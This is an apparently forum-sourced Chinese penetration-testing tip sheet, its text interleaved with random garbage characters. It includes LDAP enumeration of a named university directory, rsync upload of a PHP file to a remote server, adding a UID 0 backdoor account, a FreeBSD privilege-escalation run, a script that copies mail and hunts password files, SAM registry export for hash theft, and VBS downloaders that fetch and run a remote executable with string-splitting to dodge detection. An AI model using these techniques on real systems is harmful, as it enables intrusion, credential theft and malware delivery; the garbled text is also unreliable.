$ |3 Z h. V _; ]dn: uid=manager,dc=ruc,dc=edu,dc=cn ' l0 x9 G. R4 X* Kuid: manager, z; G7 T. t* K
objectClass: inetOrgPerson 6 f, L$ [2 p xobjectClass: organizationalPerson # k- S4 U" j8 ]4 vobjectClass: person / p% i1 C! a- P. M+ w- cobjectClass: top / z' m0 [2 v! x6 E9 y* B8 X+ E, e( tsn: manager 9 \) T% e" y6 d& \2 Qcn: manager: l3 z5 A1 U( `9 N" c
' x* P9 k6 S8 {( ^1 [2 U' q, pdn: uid=superadmin,dc=ruc,dc=edu,dc=cn6 F$ u) x* `% ^* |8 d
uid: superadmin; U8 I) {# C# U3 r' T+ }- d
objectClass: inetOrgPerson % G O& }2 K, h! r3 H- eobjectClass: organizationalPerson$ s5 e$ m( W. s$ ?3 \) Q4 R2 ~
objectClass: person $ @& v0 t0 `$ n) h+ YobjectClass: top . X% U6 U! w p' _# p! s. s% }sn: superadmin 5 _0 w5 w3 Y, hcn: superadmin5 q8 R e( q( E+ K9 o
! Z: A/ d# e! c# H
dn: uid=admin,dc=ruc,dc=edu,dc=cn + V+ K: h- U* P5 {; n3 |uid: admin" z- [: `# U# _/ r
objectClass: inetOrgPerson3 R$ ]. v7 J: U: e5 @
objectClass: organizationalPerson ' E/ }) L6 }* {4 ~& Q T" \( `1 OobjectClass: person 7 `; T I6 ~# ?6 i q3 dobjectClass: top 9 t# e2 I, U# t4 t4 _, t8 Qsn: admin# ]5 p! [% A+ ^6 H2 K0 `" _
cn: admin 2 t" {2 P& h4 G# }2 H/ B" f9 `% c& o1 d" v( f, R/ Z3 [
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn5 I. g' i. r: e( P
uid: dcp_anonymous1 ^2 D+ ^4 {- G; q+ }
objectClass: top # q2 [6 Z& d6 R6 S7 h5 qobjectClass: person ! z) e3 A+ b4 o( s" A) HobjectClass: organizationalPerson & i, e& B# i, p9 J. I( q/ S/ GobjectClass: inetOrgPerson7 {4 D: P. B b8 X
sn: dcp_anonymous) V$ e& [, ?1 ]" N6 |
cn: dcp_anonymous ( x/ `7 C1 S' E7 ?! w # E* p4 b' L; R7 ~- L- t! w. L2.查看基类& R n2 Q9 l& x* K
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | # M% O: Q; |9 D) v7 t, u. a5 k5 ^3 a: o
more9 j5 z5 n u0 l
version: 1, e# [' m9 H& k, o0 s
dn: dc=ruc,dc=edu,dc=cn* i$ s7 l* e7 M1 z: r6 N
dc: ruc T. _$ @/ p4 t3 k
objectClass: domain 0 y5 b; z1 H' y3 ]& |5 R5 N8 n3 ?5 |- R- J$ G& T! L
3.查找: Y/ l6 V) n% w
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"# r1 }4 `7 M6 E1 M' y
version: 1, P$ a( l1 y" k1 {; m8 a/ V. m$ `
dn:2 d! r* F5 X0 x1 } [# _) j2 U
objectClass: top, ~" [# A2 w5 G: {' i
namingContexts: dc=ruc,dc=edu,dc=cn ' U& [" r: _2 E: Q, ^supportedExtension: 2.16.840.1.113730.3.5.79 ^+ Z! H& b8 W5 y
supportedExtension: 2.16.840.1.113730.3.5.8 4 b+ q$ @: h' v- j/ ?supportedExtension: 1.3.6.1.4.1.4203.1.11.1 $ g6 c) D1 O# |/ ?* qsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25 d' L9 ?) `0 b) b3 k& @* {supportedExtension: 2.16.840.1.113730.3.5.38 D. v. V M( j
supportedExtension: 2.16.840.1.113730.3.5.5& c# b0 M; D2 p C* @
supportedExtension: 2.16.840.1.113730.3.5.6 ; N: I* Q! ?* g6 \1 z3 f- G! H7 ]' jsupportedExtension: 2.16.840.1.113730.3.5.4 / e6 Z) U& C0 \. g R) V1 TsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1 . S8 S5 e4 I+ U5 T4 t& o3 Z2 P; xsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2 / E/ e8 A }* GsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3 * U" q- S8 ]( j0 g4 S+ hsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4 % l( M, } C3 I) j) B. ? b- AsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5. ^* Q% D) T v! n& b
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6 0 l: @6 `9 c) P) ]& p1 |supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7 . _: w) J; v, J' }supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8) n, Z0 ^3 B, Q9 T" L* X
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9 + t- `* P& w( B6 J) g* | {supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23 1 f/ _2 T& ]% _2 {+ k* Z0 f* dsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11( W/ B, i, m6 S4 z5 H# A& W. l9 _
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12: r6 e( g# k* T+ x* O
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13( e1 o) T7 G' q2 Q. e8 k- g
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.143 J. g, k: F0 d; K, Y7 W4 y
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15! { o. z1 T* g; k4 q& R1 ]
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16* |, n; e. i( p; f& D5 r" Q) _
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17! P9 q. H) j0 B$ L2 H
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18+ a" n& Q: z; v3 o, a
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19 7 l* ?% U4 A9 l% V$ \$ w1 esupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21) H0 s0 _/ X5 j" @' @5 G6 c
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22 - o0 L' i9 K$ V" ?2 LsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24 Z- j/ U# J) Z8 s! RsupportedExtension: 1.3.6.1.4.1.1466.20037; w W) i! x1 j
supportedExtension: 1.3.6.1.4.1.4203.1.11.3! Q: z1 ?% F+ v1 k! [& }- V
supportedControl: 2.16.840.1.113730.3.4.2 : \/ M) |: U9 \: }supportedControl: 2.16.840.1.113730.3.4.3( P! ]! w$ z, F" {! q) B
supportedControl: 2.16.840.1.113730.3.4.4 2 a0 _% q* L a$ b! g0 HsupportedControl: 2.16.840.1.113730.3.4.5 " D( G2 w, j5 i6 AsupportedControl: 1.2.840.113556.1.4.473: w1 z# y$ g8 p7 y
supportedControl: 2.16.840.1.113730.3.4.9 " J6 ^& A$ L: `/ X( n$ K0 t- i5 HsupportedControl: 2.16.840.1.113730.3.4.16& t1 D+ e8 g+ r8 }( e
supportedControl: 2.16.840.1.113730.3.4.15 : j# ]$ {4 C& x! @( q, k% WsupportedControl: 2.16.840.1.113730.3.4.17 ' I) o/ A; _/ x {8 ]# [6 n, EsupportedControl: 2.16.840.1.113730.3.4.19, c6 z" G" p, i' B6 |, Z ]! M5 e
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2 ; V! Q# u# Z8 rsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.62 F# _& I) C/ s& w6 D1 Y& D
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8 ! R p" Z. S9 F0 b; d# ~1 B: asupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 % D6 f4 Q5 |8 { zsupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1 1 ^ A3 b9 q3 j- JsupportedControl: 2.16.840.1.113730.3.4.14 ' Q" i+ H* G4 `1 f7 E7 [supportedControl: 1.3.6.1.4.1.1466.29539.12 9 v; s L, }, V/ dsupportedControl: 2.16.840.1.113730.3.4.12$ H4 g. X# }: A+ l, R
supportedControl: 2.16.840.1.113730.3.4.18- l c: h6 s. U& l! a5 u% _
supportedControl: 2.16.840.1.113730.3.4.13 8 F+ [0 [$ L }supportedSASLMechanisms: EXTERNAL . ~/ K( U0 P3 ^% |supportedSASLMechanisms: DIGEST-MD5) T- h- {' Q4 p# k9 C& q& B% ]
supportedLDAPVersion: 20 r9 G* V( e/ U
supportedLDAPVersion: 3 " G$ D6 [( c/ p! ]2 w& Y9 s' NvendorName: Sun Microsystems, Inc. * w' i7 r" O; M) i+ j2 b$ L8 dvendorVersion: Sun-Java(tm)-System-Directory/6.2 : b0 N% o* |& G6 R' [. }' }0 vdataversion: 020090516011411 5 V; h$ o0 t, ~; m, gnetscapemdsuffix: cn=ldap://dc=webA:389$ l& f, q4 [' S) ^& q5 G) a0 F
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA4 u" d% u- s2 c2 T- f& W. W
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA b& I7 o' R& x _/ M: I, EsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA 6 I1 c, p" V6 t( H9 ~supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA ' w4 `/ J# ]! x) j. I2 zsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA5 w, ]$ T1 d2 T( c
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA( w" K8 f- |* o8 ^3 t
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA ' E' u% f" e% i+ K* ^4 O8 A3 LsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA U/ ]: _6 T/ A$ h
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA . o: v, _+ q( y/ j5 N) asupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA" @5 T* r, m9 C+ }( K- Z h
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA2 ^; E- c6 `! {! c! y" _( s
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA/ U$ z3 ?; x, P4 m y, E a" O
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA ! {3 C% v c5 k( O4 m4 ysupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA8 t1 E9 o/ j. E, ^4 U8 b. F
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA . ~! C$ Q. E" H( V, i; r( m! ~supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA 9 F$ F& `( K6 [* T: X$ B" hsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA& a# m; q. e) [0 Q' b
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA0 M+ u! b3 x, P! h4 L% ?, ~
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5 : |% ?; u+ _( I7 jsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA( F, X- @. @7 S" q2 e
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA; V0 u- `. I1 f* u* M# a
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA " e. I8 o, M% z- i8 J4 [5 psupportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA: }7 N* ^0 h0 d5 j# _0 J5 R
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA+ T5 z7 s; u" B7 e& q" r
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA. z: s4 Y l/ f: c; F& U
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA " g% a/ ?9 m- O* g: c% \/ MsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA " J! B6 r5 H0 n) A+ IsupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA" h( ^! E1 k" m9 u
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA * e5 z, P6 V) P; w0 }* _' \supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA 0 `2 W2 F4 Q% C1 p: K- U( p& FsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA' n, L- I% n2 j# D% K- }! X
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA/ q4 @9 U5 \8 _- g- n+ B# r& ^/ x
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA6 {& |/ D4 p2 V5 b: K5 s
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA " F/ u1 z L% s. S! G1 MsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA& m% i" ^' P! H" `
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5 P9 \2 m) R4 h Y% H% G% i
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5% f) C! ?3 u5 ?& Z8 i0 T1 X
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA 4 @" S% O- w: j2 d$ @supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA* t. V: g4 A4 H$ `% l
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA1 m) r' C+ W3 H
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA 4 C4 Y9 k; K' [supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA1 F1 e2 k; h; z& Z0 `
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5: y K) C8 f" O+ C6 T: Y
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5 ' }: W# q2 ?9 fsupportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5 8 i5 ?) W0 f) U Y) BsupportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5. I# c4 z* h& j" J
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5 ; w+ s4 k; F* |6 n; usupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5( G& \- _2 b3 X# @) z# k W; f
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD53 G: j$ c; F# G+ m1 w1 V7 G/ X
———————————— # |) s( `! \* {2. NFS渗透技巧 1 r3 S( e2 T4 s9 _1 Gshowmount -e ip( a) O" R' o3 H" T, H1 _. L
列举IP 3 R# E( r+ @' n3 n4 F7 [# Z——————8 w2 x: K/ ^' T+ j: R
3.rsync渗透技巧# Z* D5 @+ J( u2 L4 g
1.查看rsync服务器上的列表% K( C) ]8 p" I5 n' w X/ U
rsync 210.51.X.X:: 7 A" K$ g7 |0 Xfinance _) I! i" B8 ]7 simg_finance + @4 k9 L1 }, Z8 n* Qauto 8 `3 Q8 s" b& C8 X/ [# Limg_auto # M8 S v9 Y/ c% V8 ahtml_cms% Y3 X: v0 f- R, l- o
img_cms h; A- e" o2 h; W7 P1 m5 Oent_cms* k3 Z( a9 m/ Z5 A( m/ \. c' w& P# q( _
ent_img + H8 f ?7 ?( ]& E) E( O, hceshi5 S2 o4 y$ _8 X K- K/ k
res_img6 K- b! b* g0 X0 K& Q
res_img_c2 $ S1 u1 k% |. A6 q0 G: Mchip 6 B2 a- | P0 nchip_c2 1 I6 l1 H# ?" i" ~9 Gent_icms& `5 j9 D7 \* f% N
games " E$ E- m. V* m7 g) bgamesimg 0 O' A; y, B8 b+ ~0 O W3 Mmedia# H) n0 [1 d: ~' x
mediaimg 1 e& H6 F E+ A& g, C% b$ }fashion6 B" @ b7 n6 c/ Q# ]8 K9 G7 A5 `
res-fashion' k7 {; Y6 E6 b* P6 M
res-fo + y3 ~2 z# Q% q' o2 itaobao-home5 F( O& L5 T% j+ n# I$ t5 \
res-taobao-home ! w! q# J+ @- W: v" mhouse + W/ x, k, ~' C Q5 @res-house 2 X( v- v+ ~: J) `res-home 5 C+ F: ?& I" `% g& V) @! yres-edu# b% S2 d/ q e& e: o3 d
res-ent / r. p% V- U" y: ^# o! g1 o& |res-labs% C- I! ~5 k3 y* Y6 r6 _
res-news ( a8 k$ Q. Y0 {$ F$ |* k+ Lres-phtv $ ?+ x5 h2 |) O$ x: Vres-media . L: q" x9 W& x: }( Z6 s9 ]" r7 fhome3 [' S9 T" l3 {3 o1 U
edu & u6 u& G, g+ E1 b) E0 I/ Fnews 2 v* F" n8 }! f4 e- p wres-book % f. {7 H0 s* A. q( h$ O- Y$ y) e3 E' V
看相应的下级目录(注意一定要在目录后面添加上/)# ]# j9 T" Y. |& V5 e
+ n, A+ ]9 Y1 y" T+ m6 I% W7 v; s1 ?9 n2 W: a" P( i/ A
rsync 210.51.X.X::htdocs_app/2 l) F1 K# q4 g/ P
rsync 210.51.X.X::auto/6 `: P% {4 Q6 a
rsync 210.51.X.X::edu/ , e: E# W! S0 n) e8 A+ w ; x* _% f) ?& G( b8 X2.下载rsync服务器上的配置文件* G" ~0 D/ v+ v1 s- F) G( J
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/7 S6 l1 H& J$ e- x2 m) c. K
4 a* R O! _9 ~! X: G3.向上更新rsync文件(成功上传,不会覆盖)- ^5 Z- v8 J. _5 N5 H
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/ # U" U/ W: x& e" C& w2 C& H- phttp://app.finance.xxx.com/warn/nothack.txt! o, D' K4 f' i X0 P
+ g5 Y8 x8 k5 B3 A0 f0 n' E四.squid渗透技巧 3 n3 u, U% t" l* ^nc -vv baidu.com 80 . b1 ]+ Q0 I. d" d" A1 V$ q3 F( fGET HTTP://www.sina.com / HTTP/1.0+ z7 j* C+ I+ `* B( T
GET HTTP://WWW.sina.com:22 / HTTP/1.0 ( b! d& G# Q" ?, y9 j H3 N# B x4 F五.SSH端口转发- v* @; O* o# {/ J& H0 R/ W: _+ I
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip , P/ V% P0 ?9 x5 P% ?0 R g; ~0 |
六.joomla渗透小技巧8 p- F/ H1 D+ m- i8 g
确定版本4 p% q# g2 o! l# x& _( Y7 q5 q0 ?
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla- 2 W6 c% v6 t! Y; ~8 C/ E: K% w: z9 m
15&catid=32:languages&Itemid=47 $ l- d- X# v- I* B0 H. l 4 h P' T2 e O8 b& N- F重新设置密码3 p* v' a w" j* E. B1 t
index.php?option=com_user&view=reset&layout=confirm/ T/ l f+ N" a) P4 R8 F2 F9 G$ d
5 e9 j, o0 s2 a% [# [* w七: Linux添加UID为0的root用户9 d9 L; m3 W- U8 f) R
useradd -o -u 0 nothack 0 X2 j8 _( c4 C* J* ? ^, `- I1 x- L# m0 B" Y* }6 K z
八.freebsd本地提权 2 f5 ~) r i; V6 j, v5 ]) ^[argp@julius ~]$ uname -rsi 8 f \: F) o7 f7 O3 v9 f' D* freebsd 7.3-RELEASE GENERIC 1 v2 p/ o. l5 d" [6 G6 a* [argp@julius ~]$ sysctl vfs.usermount 0 k" ]; H0 G/ b5 o, ]2 g* vfs.usermount: 1. |2 Y) c7 q$ }: h9 i! s/ |% b
* [argp@julius ~]$ id & p1 f* ^" q" B% a& i( O* uid=1001(argp) gid=1001(argp) groups=1001(argp)& |/ F; \" Y( m1 H9 y
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex $ T' z# Q, ~/ ?2 B4 G0 T4 P* [argp@julius ~]$ ./nfs_mount_ex4 v, l' H: y' I: K( G8 T
* 8 T8 r* F% Q, \: Kcalling nmount() ( E: { h& @# v# v' o; C8 Z, E1 n* n* q, x I' `) Y( j9 N' y T
(注:本文原件由0x童鞋收集整理,感谢0x童鞋,本人补充和优化了点,本文毫无逻辑可言,因为是想到什么就写了,大家见谅)! o4 e, J4 x& |% @7 T! _9 @$ V
——————————————& {* f* V. k8 Z% J- P& A: r
感谢T00LS的童鞋们踊跃交流,让我学到许多经验,为了方便其他童鞋浏览,将T00LS的童鞋们补充的贴在下面,同时我也会以后将自己的一些想法跟新在后面。5 a+ M$ J; X- K5 E
———————————————————————————— ( I9 @- |' |$ b7 Z5 W. ?; x( ~+ S1、tar打包 tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*+ j& w/ W9 e8 a1 k0 a0 @9 ^
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar7 d( H3 g1 G3 h, X
{$ w* {2 i- e _$ i% t
注:4 W) w- I2 d( e8 }. t& G$ S
关于tar的打包方式,linux不以扩展名来决定文件类型。% K" c2 }: C: a* c8 h. @4 p( |3 U: Z% g
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压+ C8 a! x5 H0 S" S
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/* + [' m/ \$ }: i} $ C. ~: M( l b/ H$ m5 c) @# k
1 z# p0 b( i- K( {( Y
提权先执行systeminfo6 T4 v7 ^ ~. t& v% S6 U7 v: v
token 漏洞补丁号 KB956572" |' h4 I7 s3 J# i
Churrasco kb952004! J+ u- Z! r4 E o6 a
命令行RAR打包~~·( f' n) O* v. _5 ^5 E+ d" d
rar a -k -r -s -m3 c:\1.rar c:\folder: @% i& t7 {& w. a( @) E" a
——————————————& @% |; K: v& i5 F4 `/ l7 i% B% R
2、收集系统信息的脚本 $ A9 [' H; j& z: Y3 ffor window:/ a, u" K" y' x/ g
. H4 Z' q: Y: U) w5 G8 G
@echo off ) x c' T$ A. Q- n4 xecho #########system info collection# y. b6 }5 ?. K1 n
systeminfo+ T% Y; g/ w3 ]4 S0 G' H9 u
ver ' c, i4 }4 w6 x" @hostname. P! W2 x# k) k9 b5 A s
net user : r4 D1 ]+ k7 e- gnet localgroup # S2 J+ x8 b9 e5 G' ^; P/ tnet localgroup administrators " @5 z2 d* T( E# ]net user guest7 D5 E! s- {0 C. g
net user administrator4 j! Q5 G- @5 S7 r
( m- H4 _7 m$ |0 x: o
echo #######at- with atq#####6 o4 O. A9 C9 u/ S
echo schtask /query ; N) e6 l1 [& R; D/ A7 r9 B5 G: h* I' G* K0 \
echo8 K0 V$ S, U- \( d: P8 S4 [
echo ####task-list#############9 u) [- n& B2 j2 z5 v) [3 E! c1 z1 [$ q
tasklist /svc7 I( H1 y! x+ D3 W% L! H8 C8 ~$ K
echo: U3 W( q% s/ |2 g k$ W
echo ####net-work infomation" R3 K( |4 M( w
ipconfig/all# g& ]" d9 u+ o# ?: K$ i% B
route print' u" P4 Z5 x4 o ^* Q
arp -a 4 R( `! o# ~: o, w' Q! znetstat -anipconfig /displaydns6 Y* g7 @ L( M0 l
echo$ j5 `; F, U: u/ h5 h
echo #######service############ ' G9 P5 _; U9 Wsc query type= service state= all& X, w& y6 ?* G5 s% K
echo #######file-##############: B& U& T* H4 y, A4 F' _
cd \6 X/ Q- O. H2 f) d) s
tree -F 4 [- v9 R3 B6 Nfor linux: 8 h8 Y: P, I U8 J3 e0 m( `. r( a' t" e
#!/bin/bash : d4 U1 u* F* U% _/ a 0 p$ b. @, ]/ M2 aecho #######geting sysinfo####, F9 i! ~6 }- p; {; M: C' j2 `
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt% S0 L% }9 d0 H* G2 J
echo #######basic infomation##, I ]. S- V7 J; v5 z4 [4 ]
cat /proc/meminfo i4 h" Y9 Z( w# l
echo * f H) F; A5 b. L$ Gcat /proc/cpuinfo 0 I$ q- ~ K- ]" [' Necho % x7 d# @) |4 i/ frpm -qa 2>/dev/null4 Z1 u; N: o; ?# D F4 m+ O3 L
######stole the mail......######; r: E% u B a( ^
cp -a /var/mail /tmp/getmail 2>/dev/null }8 X) D8 p7 b# Z8 k v: t
3 R' A, b( f3 j/ t, ]) }# {5 w* ^9 @2 f$ k2 x, P! F' @& h
echo 'u'r id is' `id`# r$ a. h5 Z9 x: F/ ^1 z& E1 j& }
echo ###atq&crontab##### ! _* a0 s8 \2 V; A+ q Z% t! P: ^atq5 a8 b* e, e/ F I! g
crontab -l0 U2 V& |; f2 W: E- O8 `/ S1 Q
echo #####about var##### ' ~: d9 p* C: K" Eset- M. h4 O3 V D, c
. i- z- W0 j _8 Zecho #####about network### $ \7 O- m) @9 A" K/ F" T####this is then point in pentest,but i am a new bird,so u need to add some in it . J: k' i; t5 v- T* P1 kcat /etc/hosts$ [6 \* A7 `9 _7 J; N" O
hostname# m& W2 L* j* T( |1 E; j+ n
ipconfig -a0 p/ {# u$ Y% j/ m9 ?! g
arp -v - t8 X) [; l' _3 U" [; H) gecho ########user####9 m9 ^+ H5 a: A3 [: j' a1 i% ^
cat /etc/passwd|grep -i sh 0 P7 c3 S* U s ^' l* |: B( b! Z0 i/ J
echo ######service####. I# y4 J1 }: x7 g% `- Y" q8 x
chkconfig --list 3 w4 v; c' N& v, X 7 p4 m, k" D/ vfor i in {oracle,mysql,tomcat,samba,apache,ftp} M: z) A8 w. S* W8 {9 o w
cat /etc/passwd|grep -i $i : ~! v. f f* J6 r5 i+ P/ G Q. }done ( X. G7 j! B( H; E, x7 a# t7 q7 D! T% d( W' {
locate passwd >/tmp/password 2>/dev/null2 t6 Z" h" Z, O4 S* J6 o8 z5 m
sleep 5 0 q* t5 ]& V- r- O) blocate password >>/tmp/password 2>/dev/null ) {+ `( H$ D: g2 H% w* osleep 5 ' r1 \6 j$ L+ C Ilocate conf >/tmp/sysconfig 2>dev/null & b5 G3 R* p1 j" D/ ssleep 5* L- S; S2 i$ }1 e: _0 x
locate config >>/tmp/sysconfig 2>/dev/null& M7 m( [- z6 H- P
sleep 5; v6 s" t' H/ E4 _, t/ M9 R
! S0 E- I6 L* V( R/ q4 U! n
###maybe can use "tree /"###. l/ m$ P2 J. E6 U* Q
echo ##packing up#########; I. Q8 s/ D. Z
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig K+ h7 F: T5 I J7 i
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig; q$ I/ O8 I+ S0 P
——————————————/ M8 v t1 @3 U P# d& b
3、ethash 不免杀怎么获取本机hash。 5 P! \2 h1 O, H3 w7 A首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" (2000)$ S% @" W' W+ `6 z/ @
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg (2003)& A C0 l6 M/ e1 L2 U
注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略) ! y0 p( ]5 O; z3 p接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了 ) x" _; l% O& ~4 ]hash 抓完了记得把自己的账户密码改过来哦! 7 G4 G8 v, w& X6 V/ {据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~ 8 c6 u+ W3 A5 S8 }+ m! s—————————————— 7 {! u* v& A; ^' W/ F' V) d4、vbs 下载者 4 b% Z( u7 b/ K! _" \1 9 ^" {% `4 T7 }% |echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs ; L/ B, ?6 J7 _: kecho sGet.Mode = 3 >>c:\windows\cftmon.vbs& Z, A' T& { y. T E
echo sGet.Type = 1 >>c:\windows\cftmon.vbs ( ?% O. K1 B5 D) E* q" {echo sGet.Open() >>c:\windows\cftmon.vbs2 c3 y8 o1 h& ?3 }% W
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs" X& \5 b9 e. Z; z8 `
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs s O7 z/ \ E" o9 Necho Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs + b" N- m8 U' s+ o3 h \8 wecho objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs " l: f& k- F2 W( U8 Wcftmon.vbs e- m8 ]3 h% X3 W/ y3 Q$ J' I
* B: h( \; k: c: B1 e; C: S
2 , t. o. |9 \' s+ R# ?# xOn Error Resume Nextim iRemote,iLocal,s1,s26 H5 f N' l; W7 J3 x
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) 2 \0 R( j ?4 b g' ~& _8 `s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"0 r3 T. M1 ]# R
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()5 k& C8 Q; r9 i) e% m
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()0 h: I! g( q* s
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,24 N% ?# v: X. Y/ k v, [